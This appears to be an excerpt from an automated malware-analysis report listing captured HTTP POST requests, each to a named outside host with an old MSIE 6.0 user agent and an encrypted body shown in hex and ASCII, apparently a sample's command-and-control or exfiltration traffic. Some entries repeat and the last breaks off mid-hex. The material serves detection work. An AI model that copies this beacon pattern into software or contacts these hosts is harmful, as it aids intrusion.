                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dayvo.comCache-Control: no-cacheData Raw: 33 33 57 56 45 4d 78 49 37 51 79 73 39 42 2b 54 4e 2b 31 6f 69 39 2b 46 76 6c 61 6b 4a 65 7a 53 77 41 5a 37 72 6e 41 6f 4e 71 37 4c 44 33 36 57 58 2b 53 6b 4c 77 38 64 6c 57 4b 57 74 46 33 72 6f 44 75 77 62 35 41 57 2b 69 36 79 50 6a 44 46 61 53 65 36 33 32 44 45 36 4f 6f 70 2f 57 32 70 45 77 61 45 58 59 6e 4c 39 52 77 54 32 37 39 57 71 36 61 65 43 61 50 72 4c 46 37 41 44 50 39 2b 59 45 35 62 65 77 77 63 4e 75 53 50 70 39 31 55 4f 70 63 61 72 79 6f 78 52 45 77 43 6c 6c 49 50 6c 65 57 72 74 31 47 41 38 53 30 79 6f 31 73 4b 6b 4f 6f 6d 6c 69 68 36 6e 2b 6b 64 33 49 4f 44 35 78 35 6e 4e 52 39 31 56 2f 77 4f 2f 56 4d 4c 49 57 59 75 67 41 6c 73 44 75 4b 47 6c 4b 2b 43 58 76 48 39 65 49 48 69 37 61 4f 6d 6d 76 57 79 53 4a 6f 74 66 47 48 41 31 6b 32 51 57 2b 39 77 41 4f 58 4c 50 57 73 73 47 59 66 68 4e 6a 43 43 44 6d 38 57 38 70 6d 55 77 66 47 4e 58 75 58 6a 36 53 30 79 64 6d 32 76 6a 6d 36 73 50 54 37 6f 2b 2b 30 39 4e 6f 33 44 57 57 65 7a 6c 71 4e 31 77 72 4a 6d 66 72 4c 54 61 74 79 55 2f 38 48 52 64 57 71 6e 6a 43 41 6a 44 45 52 39 76 33 75 43 49 41 41 4f 61 57 56 66 79 57 54 34 30 4b 65 4a 33 6d 71 4b 77 66 52 50 6a 73 67 36 59 4d 34 42 52 6c 77 56 71 56 48 45 47 71 36 77 37 41 6b 53 38 52 4c 45 6b 50 62 4f 71 41 5a 45 6c 75 6d 30 39 53 63 4a 37 4e 38 4a 4a 35 51 50 6b 41 6a 38 6a 48 51 74 6c 42 6c 55 35 2b 6b 67 79 64 56 39 2b 30 43 53 30 4b 2b 37 50 78 6e 2f 47 45 65 6f 6f 77 31 32 59 2f 41 6f 75 56 4b 72 4b 79 6a 57 76 30 39 51 4d 41 36 39 77 6b 38 2b 47 49 69 75 6d 37 65 52 63 55 37 30 41 33 4e 32 72 76 61 72 65 4b 34 55 2b 68 34 6b 55 53 31 30 76 49 48 57 6d 79 34 44 70 42 53 31 36 76 52 59 64 39 2f 6c 44 75 33 6c 45 38 45 39 64 31 51 7a 6e 54 68 5a 57 5a 6c 67 6e 34 63 58 59 69 69 59 74 35 6d 52 4b 32 63 72 2f 54 77 3d Data Ascii: 33WVEMxI7Qys9B+TN+1oi9+FvlakJezSwAZ7rnAoNq7LD36WX+SkLw8dlWKWtF3roDuwb5AW+i6yPjDFaSe632DE6Oop/W2pEwaEXYnL9RwT279Wq6aeCaPrLF7ADP9+YE5bewwcNuSPp91UOpcaryoxREwCllIPleWrt1GA8S0yo1sKkOomlih6n+kd3IOD5x5nNR91V/wO/VMLIWYugAlsDuKGlK+CXvH9eIHi7aOmmvWySJotfGHA1k2QW+9wAOXLPWssGYfhNjCCDm8W8pmUwfGNXuXj6S0ydm2vjm6sPT7o++09No3DWWezlqN1wrJmfrLTatyU/8HRdWqnjCAjDER9v3uCIAAOaWVfyWT40KeJ3mqKwfRPjsg6YM4BRlwVqVHEGq6w7AkS8RLEkPbOqAZElum09ScJ7N8JJ5QPkAj8jHQtlBlU5+kgydV9+0CS0K+7Pxn/GEeoow12Y/AouVKrKyjWv09QMA69wk8+GIium7eRcU70A3N2rvareK4U+h4kUS10vIHWmy4DpBS16vRYd9/lDu3lE8E9d1QznThZWZlgn4cXYiiYt5mRK2cr/Tw=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.valselit.comCache-Control: no-cacheData Raw: 41 2f 54 6a 44 72 63 36 37 51 78 51 5a 73 39 70 4a 74 69 2b 4a 51 43 79 44 56 70 74 49 56 70 7a 32 78 48 52 50 50 6b 32 37 33 69 67 78 4d 31 44 62 30 42 34 46 4d 62 42 6b 6b 45 77 67 61 48 59 51 63 30 55 4f 76 32 4f 66 6b 77 62 52 58 79 36 33 48 61 69 72 4b 33 45 37 4e 56 62 6f 43 41 72 39 4c 51 71 63 74 43 43 30 6c 6e 45 33 2b 38 78 44 6f 79 71 4d 75 75 6f 73 46 65 64 70 71 70 6a 4f 64 30 4d 37 63 51 73 2f 38 66 6a 4d 36 42 70 30 74 62 34 44 58 73 34 76 39 76 78 34 48 2b 6c 4e 54 56 73 6b 69 6c 73 77 65 47 45 50 4d 72 2b 64 45 36 69 45 46 79 67 74 31 5a 49 73 77 74 2f 65 36 36 48 71 67 5a 4e 37 64 35 4e 73 63 69 77 74 45 50 46 35 39 52 46 4d 31 4b 42 36 77 4a 31 37 70 6a 6a 4c 54 57 35 58 5a 4c 6a 69 6b 2f 56 72 79 56 49 4a 53 2b 48 51 75 77 4a 76 46 70 73 4e 61 35 52 6b 33 7a 67 35 31 38 68 78 41 32 48 48 47 50 72 31 42 37 62 42 68 55 55 4f 34 65 30 64 39 76 45 56 59 69 42 57 77 62 51 44 45 57 38 6f 5a 38 56 38 4d 78 73 61 64 31 61 42 66 73 31 30 56 63 73 73 44 61 56 73 77 78 6d 35 62 4b 67 37 43 48 4c 55 6e 43 38 35 4c 51 67 38 72 4e 31 78 6e 71 6c 5a 59 64 78 4d 4f 36 6a 6b 4a 73 4a 52 6c 32 5a 72 75 6b 76 66 30 71 42 38 46 35 64 31 53 75 39 6e 44 39 6e 46 46 43 5a 2b 69 55 44 38 66 6e 57 66 35 45 31 72 48 61 71 6c 56 35 33 67 50 39 6e 71 6d 77 41 2b 36 76 48 6b 32 74 36 59 76 62 71 59 77 44 72 44 33 35 65 62 38 34 6e 2f 34 34 66 75 31 47 37 73 39 41 61 39 44 68 71 35 77 43 77 36 2b 68 57 43 2b 78 79 6e 33 77 66 55 45 6a 71 32 73 38 4a 6c 32 53 57 59 69 67 6d 6c 7a 4f 7a 7a 64 42 57 4f 61 45 5a 74 4f 6c 76 58 50 4b 36 6e 49 2b 6a 57 75 64 38 5a 39 65 4c 46 58 44 49 63 54 31 57 68 74 4d 50 52 37 43 4a 2b 33 77 59 59 74 58 59 71 45 49 47 66 78 69 34 68 77 49 36 41 47 63 35 Data Ascii: A/TjDrc67QxQZs9pJti+JQCyDVptIVpz2xHRPPk273igxM1Db0B4FMbBkkEwgaHYQc0UOv2OfkwbRXy63HairK3E7NVboCAr9LQqctCC0lnE3+8xDoyqMuuosFedpqpjOd0M7cQs/8fjM6Bp0tb4DXs4v9vx4H+lNTVskilsweGEPMr+dE6iEFygt1ZIswt/e66HqgZN7d5NsciwtEPF59RFM1KB6wJ17pjjLTW5XZLjik/VryVIJS+HQuwJvFpsNa5Rk3zg518hxA2HHGPr1B7bBhUUO4e0d9vEVYiBWwbQDEW8oZ8V8Mxsad1aBfs10VcssDaVswxm5bKg7CHLUnC85LQg8rN1xnqlZYdxMO6jkJsJRl2Zrukvf0qB8F5d1Su9nD9nFFCZ+iUD8fnWf5E1rHaqlV53gP9nqmwA+6vHk2t6YvbqYwDrD35eb84n/44fu1G7s9Aa9Dhq5wCw6+hWC+xyn3wfUEjq2s8Jl2SWYigmlzOzzdBWOaEZtOlvXPK6nI+jWud8Z9eLFXDIcT1WhtMPR7CJ+3wYYtXYqEIGfxi4hwI6AGc5
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.edimart.huCache-Control: no-cacheData Raw: 38 75 4f 51 75 58 51 30 79 51 77 38 54 72 32 42 7a 39 58 67 4c 4d 64 37 58 65 78 73 62 67 6c 67 36 42 41 59 56 72 7a 2f 6e 43 39 42 38 2b 78 6d 55 70 70 75 36 7a 58 57 46 44 4f 50 56 61 34 59 5a 4f 47 66 69 50 6a 56 33 55 35 49 63 4a 57 55 44 2f 49 4d 34 51 2b 75 46 41 78 78 39 31 4b 61 53 73 5a 4b 64 67 6c 33 37 6e 33 74 4b 5a 32 34 47 78 7a 70 39 4f 56 48 71 67 41 6b 61 57 56 2b 4e 50 4c 61 79 4a 52 78 49 52 58 7a 54 79 33 6a 79 62 4d 77 69 59 6d 35 51 77 7a 70 79 64 78 51 4d 4f 76 39 6a 48 50 7a 30 33 6e 53 59 59 78 64 31 71 4c 30 52 52 4f 45 6a 6e 74 67 68 41 39 34 62 72 6e 6a 35 57 50 75 44 69 38 77 79 77 30 39 55 34 6e 30 70 4a 63 2b 72 44 54 63 53 36 69 4e 50 6e 35 70 5a 4f 32 50 57 4b 6f 66 43 52 47 6f 30 72 78 38 69 36 58 46 38 72 4a 72 74 53 4a 46 30 43 7a 6a 68 49 69 4c 6c 48 51 39 34 70 2f 75 4a 59 48 74 56 4e 65 45 6e 7a 37 46 42 5a 76 67 69 44 6a 33 78 5a 71 31 58 47 64 39 4a 7a 68 34 4c 52 66 6d 79 54 4b 53 7a 31 47 55 43 49 6e 4a 52 58 53 2b 31 43 43 69 4e 52 36 4d 66 4f 74 62 31 32 35 30 5a 49 6f 59 65 4e 46 62 71 39 63 4f 37 43 5a 30 74 6a 50 68 62 51 53 6c 44 54 37 67 58 39 43 62 30 72 38 61 4f 35 50 73 66 79 71 44 6e 65 67 65 75 45 39 36 78 6d 78 46 2b 39 4e 70 55 30 5a 67 4b 4f 35 54 64 63 71 49 50 38 2f 2f 73 66 79 79 59 33 46 4b 62 57 4f 41 6c 62 57 2f 4a 31 57 77 74 77 78 2f 30 7a 6a 4d 36 6c 49 59 76 46 59 72 37 64 59 2f 79 41 63 57 5a 5a 62 49 68 65 56 43 30 36 79 72 52 4b 78 67 44 38 62 4b 43 79 37 5a 70 64 75 6a 59 4d 31 4e 69 4f 55 6e 79 72 48 59 71 62 33 52 42 7a 46 4a 48 36 6d 70 54 4d 51 6d 56 36 30 77 52 4f 65 53 71 51 2f 57 77 43 64 45 77 33 7a 46 76 32 61 42 65 51 4e 47 33 44 63 52 37 31 35 65 53 4b 78 4f 75 45 39 63 62 41 3d 3d Data Ascii: 8uOQuXQ0yQw8Tr2Bz9XgLMd7Xexsbglg6BAYVrz/nC9B8+xmUppu6zXWFDOPVa4YZOGfiPjV3U5IcJWUD/IM4Q+uFAxx91KaSsZKdgl37n3tKZ24Gxzp9OVHqgAkaWV+NPLayJRxIRXzTy3jybMwiYm5QwzpydxQMOv9jHPz03nSYYxd1qL0RROEjntghA94brnj5WPuDi8wyw09U4n0pJc+rDTcS6iNPn5pZO2PWKofCRGo0rx8i6XF8rJrtSJF0CzjhIiLlHQ94p/uJYHtVNeEnz7FBZvgiDj3xZq1XGd9Jzh4LRfmyTKSz1GUCInJRXS+1CCiNR6MfOtb1250ZIoYeNFbq9cO7CZ0tjPhbQSlDT7gX9Cb0r8aO5PsfyqDnegeuE96xmxF+9NpU0ZgKO5TdcqIP8//sfyyY3FKbWOAlbW/J1Wwtwx/0zjM6lIYvFYr7dY/yAcWZZbIheVC06yrRKxgD8bKCy7ZpdujYM1NiOUnyrHYqb3RBzFJH6mpTMQmV60wROeSqQ/WwCdEw3zFv2aBeQNG3DcR715eSKxOuE9cbA==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.edimart.huCache-Control: no-cacheData Raw: 38 75 4f 51 75 58 51 30 79 51 77 38 54 72 32 42 7a 39 58 67 4c 4d 64 37 58 65 78 73 62 67 6c 67 36 42 41 59 56 72 7a 2f 6e 43 39 42 38 2b 78 6d 55 70 70 75 36 7a 58 57 46 44 4f 50 56 61 34 59 5a 4f 47 66 69 50 6a 56 33 55 35 49 63 4a 57 55 44 2f 49 4d 34 51 2b 75 46 41 78 78 39 31 4b 61 53 73 5a 4b 64 67 6c 33 37 6e 33 74 4b 5a 32 34 47 78 7a 70 39 4f 56 48 71 67 41 6b 61 57 56 2b 4e 50 4c 61 79 4a 52 78 49 52 58 7a 54 79 33 6a 79 62 4d 77 69 59 6d 35 51 77 7a 70 79 64 78 51 4d 4f 76 39 6a 48 50 7a 30 33 6e 53 59 59 78 64 31 71 4c 30 52 52 4f 45 6a 6e 74 67 68 41 39 34 62 72 6e 6a 35 57 50 75 44 69 38 77 79 77 30 39 55 34 6e 30 70 4a 63 2b 72 44 54 63 53 36 69 4e 50 6e 35 70 5a 4f 32 50 57 4b 6f 66 43 52 47 6f 30 72 78 38 69 36 58 46 38 72 4a 72 74 53 4a 46 30 43 7a 6a 68 49 69 4c 6c 48 51 39 34 70 2f 75 4a 59 48 74 56 4e 65 45 6e 7a 37 46 42 5a 76 67 69 44 6a 33 78 5a 71 31 58 47 64 39 4a 7a 68 34 4c 52 66 6d 79 54 4b 53 7a 31 47 55 43 49 6e 4a 52 58 53 2b 31 43 43 69 4e 52 36 4d 66 4f 74 62 31 32 35 30 5a 49 6f 59 65 4e 46 62 71 39 63 4f 37 43 5a 30 74 6a 50 68 62 51 53 6c 44 54 37 67 58 39 43 62 30 72 38 61 4f 35 50 73 66 79 71 44 6e 65 67 65 75 45 39 36 78 6d 78 46 2b 39 4e 70 55 30 5a 67 4b 4f 35 54 64 63 71 49 50 38 2f 2f 73 66 79 79 59 33 46 4b 62 57 4f 41 6c 62 57 2f 4a 31 57 77 74 77 78 2f 30 7a 6a 4d 36 6c 49 59 76 46 59 72 37 64 59 2f 79 41 63 57 5a 5a 62 49 68 65 56 43 30 36 79 72 52 4b 78 67 44 38 62 4b 43 79 37 5a 70 64 75 6a 59 4d 31 4e 69 4f 55 6e 79 72 48 59 71 62 33 52 42 7a 46 4a 48 36 6d 70 54 4d 51 6d 56 36 30 77 52 4f 65 53 71 51 2f 57 77 43 64 45 77 33 7a 46 76 32 61 42 65 51 4e 47 33 44 63 52 37 31 35 65 53 4b 78 4f 75 45 39 63 62 41 3d 3d Data Ascii: 8uOQuXQ0yQw8Tr2Bz9XgLMd7Xexsbglg6BAYVrz/nC9B8+xmUppu6zXWFDOPVa4YZOGfiPjV3U5IcJWUD/IM4Q+uFAxx91KaSsZKdgl37n3tKZ24Gxzp9OVHqgAkaWV+NPLayJRxIRXzTy3jybMwiYm5QwzpydxQMOv9jHPz03nSYYxd1qL0RROEjntghA94brnj5WPuDi8wyw09U4n0pJc+rDTcS6iNPn5pZO2PWKofCRGo0rx8i6XF8rJrtSJF0CzjhIiLlHQ94p/uJYHtVNeEnz7FBZvgiDj3xZq1XGd9Jzh4LRfmyTKSz1GUCInJRXS+1CCiNR6MfOtb1250ZIoYeNFbq9cO7CZ0tjPhbQSlDT7gX9Cb0r8aO5PsfyqDnegeuE96xmxF+9NpU0ZgKO5TdcqIP8//sfyyY3FKbWOAlbW/J1Wwtwx/0zjM6lIYvFYr7dY/yAcWZZbIheVC06yrRKxgD8bKCy7ZpdujYM1NiOUnyrHYqb3RBzFJH6mpTMQmV60wROeSqQ/WwCdEw3zFv2aBeQNG3DcR715eSKxOuE9cbA==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora-ito.comCache-Control: no-cacheData Raw: 77 2f 6a 47 76 6c 6f 54 52 67 32 4d 6e 72 50 34 66 63 70 39 75 4a 31 46 4e 34 74 4b 31 67 46 54 4c 74 75 71 75 70 6c 68 71 6e 56 54 4b 73 6a 4b 73 48 50 68 6c 39 77 63 39 42 45 64 49 66 77 68 52 4c 4b 65 65 65 73 6a 45 6c 71 6c 75 44 67 62 4c 56 79 4e 6c 30 35 50 34 47 58 62 4b 72 6d 4d 68 35 73 61 6b 70 75 51 32 56 4a 51 46 4b 39 39 78 39 34 59 70 35 6e 43 64 39 36 7a 6d 78 4c 73 46 5a 39 6c 65 5a 41 72 4a 44 34 74 43 46 6f 6c 7a 41 74 48 66 6e 4c 30 4c 41 6d 46 7a 42 5a 64 7a 34 4d 4f 48 42 68 58 50 44 57 30 50 7a 47 6d 47 34 55 36 33 38 56 50 33 79 7a 70 46 64 2f 49 65 4a 44 46 36 47 45 74 6a 78 70 4f 73 53 48 79 74 76 38 66 68 52 78 2b 6a 42 4c 61 2f 65 67 67 7a 64 79 61 79 2f 42 50 68 4a 47 76 2f 61 63 35 7a 69 78 6c 6a 4a 36 37 50 4e 72 58 44 33 50 44 4f 6b 71 39 67 31 49 37 71 4e 45 6b 38 48 77 31 5a 45 73 71 58 53 55 53 50 2b 5a 45 4f 63 62 58 56 68 38 73 6a 76 54 31 59 36 41 76 2f 4e 4f 43 46 74 49 78 61 38 70 56 30 4e 33 42 4e 66 51 35 30 39 70 31 39 42 45 6a 71 51 4b 6c 61 57 2f 78 44 57 45 49 57 7a 65 74 78 4d 74 6c 38 68 5a 66 6d 75 55 72 51 58 32 49 32 6f 53 6d 65 58 6c 78 53 2f 7a 38 2f 78 67 47 57 32 6b 6f 46 6f 51 2b 6c 42 62 6a 4e 64 49 53 32 64 45 51 5a 44 67 56 67 71 47 56 49 66 55 32 51 36 68 70 64 54 55 76 74 4a 66 61 4d 4f 34 50 59 4e 67 42 4d 77 73 73 45 31 65 34 50 4d 32 42 4f 74 74 35 75 4f 39 51 52 67 55 77 64 46 61 31 4c 44 69 48 39 36 37 4b 49 4e 61 4e 79 59 77 61 49 33 4c 6d 4d 33 49 34 5a 79 6c 67 6b 46 32 49 36 6c 70 51 43 4c 43 67 36 32 5a 51 79 6d 2f 53 70 59 6a 37 73 75 6b 59 31 59 6f 45 68 4c 37 77 77 61 4d 43 4b 4c 51 6f 42 5a 7a 32 63 46 79 68 77 58 74 79 4d 41 59 4a 75 34 72 6c 71 44 75 30 62 35 6a 5a 44 46 39 50 43 63 41 34 51 43 57 5a 6b 73 51 38 43 76 70 74 48 56 49 2b 58 34 46 71 64 52 57 37 4d 4a 58 41 74 68 4a 43 6d 77 3d 3d Data Ascii: w/jGvloTRg2MnrP4fcp9uJ1FN4tK1gFTLtuquplhqnVTKsjKsHPhl9wc9BEdIfwhRLKeeesjElqluDgbLVyNl05P4GXbKrmMh5sakpuQ2VJQFK99x94Yp5nCd96zmxLsFZ9leZArJD4tCFolzAtHfnL0LAmFzBZdz4MOHBhXPDW0PzGmG4U638VP3yzpFd/IeJDF6GEtjxpOsSHytv8fhRx+jBLa/eggzdyay/BPhJGv/ac5zixljJ67PNrXD3PDOkq9g1I7qNEk8Hw1ZEsqXSUSP+ZEOcbXVh8sjvT1Y6Av/NOCFtIxa8pV0N3BNfQ509p19BEjqQKlaW/xDWEIWzetxMtl8hZfmuUrQX2I2oSmeXlxS/z8/xgGW2koFoQ+lBbjNdIS2dEQZDgVgqGVIfU2Q6hpdTUvtJfaMO4PYNgBMwssE1e4PM2BOtt5uO9QRgUwdFa1LDiH967KINaNyYwaI3LmM3I4ZylgkF2I6lpQCLCg62ZQym/SpYj7sukY1YoEhL7wwaMCKLQoBZz2cFyhwXtyMAYJu4rlqDu0b5jZDF9PCcA4QCWZksQ8CvptHVI+X4FqdRW7MJXAthJCmw==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stajum.comCache-Control: no-cacheData Raw: 68 37 66 41 76 68 70 55 5a 77 30 70 30 58 46 6a 50 5a 53 36 54 46 30 45 63 50 34 4b 68 71 4e 70 37 73 2b 74 4b 55 67 45 33 67 62 36 32 2f 2f 63 44 68 72 53 41 74 76 33 64 6d 62 77 72 51 66 73 7a 5a 45 67 4e 64 32 66 2f 6e 69 30 75 35 33 6b 35 73 2f 71 75 33 73 43 4d 43 41 61 74 6f 42 41 75 48 57 35 66 43 50 45 61 51 6b 68 48 6f 4e 62 55 54 4a 77 45 51 49 71 43 74 6c 35 6e 64 6a 6e 62 6d 39 49 6e 52 7a 42 34 39 4e 42 2f 33 46 79 59 2b 67 6c 39 48 5a 64 77 30 4b 70 51 2b 4c 72 76 56 50 76 56 38 4c 4c 36 7a 72 33 68 39 41 45 43 63 31 35 6d 70 34 43 6f 2b 2b 58 39 6d 65 6d 48 33 4d 52 4c 36 73 79 64 64 6c 74 6c 2f 41 6c 58 68 6b 4f 62 39 6d 63 46 33 57 39 62 4c 34 76 54 76 67 62 57 36 67 6f 4e 59 55 53 70 42 79 59 64 4d 58 51 34 4b 35 67 69 52 78 6a 52 32 45 33 74 33 52 39 34 4e 79 74 51 58 6b 49 73 62 4d 77 62 77 51 64 74 59 65 68 76 68 39 72 74 6b 30 30 4b 64 43 34 48 4b 61 2b 39 79 64 69 72 42 2f 6d 45 4f 67 68 2f 53 71 79 54 69 75 76 51 37 61 67 53 50 6b 4b 4b 62 52 61 53 4c 37 2f 73 58 32 79 43 4f 78 39 2b 32 45 47 4a 6f 78 65 51 46 65 67 6b 4a 36 31 38 6e 43 4c 52 6e 49 38 4d 52 4a 2b 56 67 7a 73 62 47 57 5a 35 31 35 65 36 58 74 77 4e 4a 63 43 4a 4f 74 53 52 77 39 43 56 52 55 42 4a 67 35 58 36 44 45 65 43 73 41 51 7a 44 50 39 46 51 79 37 4e 58 37 30 35 4c 2f 41 2b 6b 32 49 61 37 4b 6c 6b 41 46 55 59 7a 59 38 75 33 47 46 2f 55 30 6c 62 6c 63 75 64 73 63 6b 4c 48 36 78 6e 44 65 75 6b 6b 36 71 79 58 33 6b 70 57 6b 70 6a 52 6c 5a 61 33 5a 4a 73 69 46 74 53 38 43 47 54 73 36 2f 42 70 64 6d 73 33 68 5a 6b 6c 52 47 76 45 63 67 39 41 55 36 5a 73 6d 2b 48 4f 78 4f 72 42 49 4f 45 64 69 46 39 67 6d 70 72 67 41 45 71 72 6f 45 41 73 49 57 44 6a 62 41 Data Ascii: h7fAvhpUZw0p0XFjPZS6TF0EcP4KhqNp7s+tKUgE3gb62//cDhrSAtv3dmbwrQfszZEgNd2f/ni0u53k5s/qu3sCMCAatoBAuHW5fCPEaQkhHoNbUTJwEQIqCtl5ndjnbm9InRzB49NB/3FyY+gl9HZdw0KpQ+LrvVPvV8LL6zr3h9AECc15mp4Co++X9memH3MRL6syddltl/AlXhkOb9mcF3W9bL4vTvgbW6goNYUSpByYdMXQ4K5giRxjR2E3t3R94NytQXkIsbMwbwQdtYehvh9rtk00KdC4HKa+9ydirB/mEOgh/SqyTiuvQ7agSPkKKbRaSL7/sX2yCOx9+2EGJoxeQFegkJ618nCLRnI8MRJ+VgzsbGWZ515e6XtwNJcCJOtSRw9CVRUBJg5X6DEeCsAQzDP9FQy7NX705L/A+k2Ia7KlkAFUYzY8u3GF/U0lblcudsckLH6xnDeukk6qyX3kpWkpjRlZa3ZJsiFtS8CGTs6/Bpdms3hZklRGvEcg9AU6Zsm+HOxOrBIOEdiF9gmprgAEqroEAsIWDjbA
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora-ito.comCache-Control: no-cacheData Raw: 77 2f 6a 47 76 6c 6f 54 52 67 32 4d 6e 72 50 34 66 63 70 39 75 4a 31 46 4e 34 74 4b 31 67 46 54 4c 74 75 71 75 70 6c 68 71 6e 56 54 4b 73 6a 4b 73 48 50 68 6c 39 77 63 39 42 45 64 49 66 77 68 52 4c 4b 65 65 65 73 6a 45 6c 71 6c 75 44 67 62 4c 56 79 4e 6c 30 35 50 34 47 58 62 4b 72 6d 4d 68 35 73 61 6b 70 75 51 32 56 4a 51 46 4b 39 39 78 39 34 59 70 35 6e 43 64 39 36 7a 6d 78 4c 73 46 5a 39 6c 65 5a 41 72 4a 44 34 74 43 46 6f 6c 7a 41 74 48 66 6e 4c 30 4c 41 6d 46 7a 42 5a 64 7a 34 4d 4f 48 42 68 58 50 44 57 30 50 7a 47 6d 47 34 55 36 33 38 56 50 33 79 7a 70 46 64 2f 49 65 4a 44 46 36 47 45 74 6a 78 70 4f 73 53 48 79 74 76 38 66 68 52 78 2b 6a 42 4c 61 2f 65 67 67 7a 64 79 61 79 2f 42 50 68 4a 47 76 2f 61 63 35 7a 69 78 6c 6a 4a 36 37 50 4e 72 58 44 33 50 44 4f 6b 71 39 67 31 49 37 71 4e 45 6b 38 48 77 31 5a 45 73 71 58 53 55 53 50 2b 5a 45 4f 63 62 58 56 68 38 73 6a 76 54 31 59 36 41 76 2f 4e 4f 43 46 74 49 78 61 38 70 56 30 4e 33 42 4e 66 51 35 30 39 70 31 39 42 45 6a 71 51 4b 6c 61 57 2f 78 44 57 45 49 57 7a 65 74 78 4d 74 6c 38 68 5a 66 6d 75 55 72 51 58 32 49 32 6f 53 6d 65 58 6c 78 53 2f 7a 38 2f 78 67 47 57 32 6b 6f 46 6f 51 2b 6c 42 62 6a 4e 64 49 53 32 64 45 51 5a 44 67 56 67 71 47 56 49 66 55 32 51 36 68 70 64 54 55 76 74 4a 66 61 4d 4f 34 50 59 4e 67 42 4d 77 73 73 45 31 65 34 50 4d 32 42 4f 74 74 35 75 4f 39 51 52 67 55 77 64 46 61 31 4c 44 69 48 39 36 37 4b 49 4e 61 4e 79 59 77 61 49 33 4c 6d 4d 33 49 34 5a 79 6c 67 6b 46 32 49 36 6c 70 51 43 4c 43 67 36 32 5a 51 79 6d 2f 53 70 59 6a 37 73 75 6b 59 31 59 6f 45 68 4c 37 77 77 61 4d 43 4b 4c 51 6f 42 5a 7a 32 63 46 79 68 77 58 74 79 4d 41 59 4a 75 34 72 6c 71 44 75 30 62 35 6a 5a 44 46 39 50 43 63 41 34 51 43 57 5a 6b 73 51 38 43 76 70 74 48 56 49 2b 58 34 46 71 64 52 57 37 4d 4a 58 41 74 68 4a 43 6d 77 3d 3d Data Ascii: w/jGvloTRg2MnrP4fcp9uJ1FN4tK1gFTLtuquplhqnVTKsjKsHPhl9wc9BEdIfwhRLKeeesjElqluDgbLVyNl05P4GXbKrmMh5sakpuQ2VJQFK99x94Yp5nCd96zmxLsFZ9leZArJD4tCFolzAtHfnL0LAmFzBZdz4MOHBhXPDW0PzGmG4U638VP3yzpFd/IeJDF6GEtjxpOsSHytv8fhRx+jBLa/eggzdyay/BPhJGv/ac5zixljJ67PNrXD3PDOkq9g1I7qNEk8Hw1ZEsqXSUSP+ZEOcbXVh8sjvT1Y6Av/NOCFtIxa8pV0N3BNfQ509p19BEjqQKlaW/xDWEIWzetxMtl8hZfmuUrQX2I2oSmeXlxS/z8/xgGW2koFoQ+lBbjNdIS2dEQZDgVgqGVIfU2Q6hpdTUvtJfaMO4PYNgBMwssE1e4PM2BOtt5uO9QRgUwdFa1LDiH967KINaNyYwaI3LmM3I4ZylgkF2I6lpQCLCg62ZQym/SpYj7sukY1YoEhL7wwaMCKLQoBZz2cFyhwXtyMAYJu4rlqDu0b5jZDF9PCcA4QCWZksQ8CvptHVI+X4FqdRW7MJXAthJCmw==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stajum.comCache-Control: no-cacheData Raw: 68 37 66 41 76 68 70 55 5a 77 30 70 30 58 46 6a 50 5a 53 36 54 46 30 45 63 50 34 4b 68 71 4e 70 37 73 2b 74 4b 55 67 45 33 67 62 36 32 2f 2f 63 44 68 72 53 41 74 76 33 64 6d 62 77 72 51 66 73 7a 5a 45 67 4e 64 32 66 2f 6e 69 30 75 35 33 6b 35 73 2f 71 75 33 73 43 4d 43 41 61 74 6f 42 41 75 48 57 35 66 43 50 45 61 51 6b 68 48 6f 4e 62 55 54 4a 77 45 51 49 71 43 74 6c 35 6e 64 6a 6e 62 6d 39 49 6e 52 7a 42 34 39 4e 42 2f 33 46 79 59 2b 67 6c 39 48 5a 64 77 30 4b 70 51 2b 4c 72 76 56 50 76 56 38 4c 4c 36 7a 72 33 68 39 41 45 43 63 31 35 6d 70 34 43 6f 2b 2b 58 39 6d 65 6d 48 33 4d 52 4c 36 73 79 64 64 6c 74 6c 2f 41 6c 58 68 6b 4f 62 39 6d 63 46 33 57 39 62 4c 34 76 54 76 67 62 57 36 67 6f 4e 59 55 53 70 42 79 59 64 4d 58 51 34 4b 35 67 69 52 78 6a 52 32 45 33 74 33 52 39 34 4e 79 74 51 58 6b 49 73 62 4d 77 62 77 51 64 74 59 65 68 76 68 39 72 74 6b 30 30 4b 64 43 34 48 4b 61 2b 39 79 64 69 72 42 2f 6d 45 4f 67 68 2f 53 71 79 54 69 75 76 51 37 61 67 53 50 6b 4b 4b 62 52 61 53 4c 37 2f 73 58 32 79 43 4f 78 39 2b 32 45 47 4a 6f 78 65 51 46 65 67 6b 4a 36 31 38 6e 43 4c 52 6e 49 38 4d 52 4a 2b 56 67 7a 73 62 47 57 5a 35 31 35 65 36 58 74 77 4e 4a 63 43 4a 4f 74 53 52 77 39 43 56 52 55 42 4a 67 35 58 36 44 45 65 43 73 41 51 